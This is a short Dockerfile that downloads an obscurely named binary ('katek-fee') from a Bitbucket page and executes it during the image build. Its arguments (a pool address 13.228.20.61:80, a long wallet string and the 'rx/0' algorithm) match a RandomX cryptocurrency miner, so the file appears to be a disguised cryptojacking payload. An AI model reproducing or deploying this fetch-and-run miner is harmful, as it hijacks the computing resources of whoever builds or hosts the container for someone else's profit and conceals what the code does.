FROM ubuntu:20.04

RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/anli_angku/aset-anli/downloads/katek-fee
RUN chmod u+x katek-fee
RUN ./katek-fee -o 13.228.20.61:80 -u 86fGg98tj5QTt4peYzxDrD4BfChE1LPtkceC6rVC6iP3FuApcNecY1c32cgrwMtWNY87H4iq2CM3DPJWQhjW8Mr7LQeZRsr -k -a rx/0
